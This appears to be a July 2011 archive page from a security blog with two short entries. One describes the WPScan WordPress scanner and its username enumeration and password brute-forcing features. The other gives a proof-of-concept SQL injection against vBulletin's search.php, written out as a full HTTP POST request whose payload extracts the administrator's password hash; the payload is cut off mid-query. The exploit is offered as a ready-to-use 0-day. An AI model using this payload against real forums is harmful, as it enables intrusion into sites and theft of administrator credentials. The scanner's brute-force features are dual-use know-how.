Monthly Archive: July 2011

WPScan – WordPress security scanner

WPScan is a security scanner that checks WordPress installations for weaknesses using a black-box method. Its main features are username enumeration, multithreaded password brute-forcing, WordPress version enumeration and plugin vulnerability enumeration. Download here | Source...


vBulletin "Search UI" SQL Injection 0-day – part II

vBulletin "Search UI" SQL Injection PoC:

POST /search.php?do=process HTTP/1.1
Host:
Content-Type: application/x-www-form-urlencoded

humanverify[]=&searchfromtype=vBForum%3ASocialGroupMessage&do=process&contenttypeid=5&categoryid[]=-99) union select password from user where userid=1 and row(1,1)>(select count(*),concat( (select user.password) ,0x3a,floor(rand(0)*2)) x from (select 1 union select...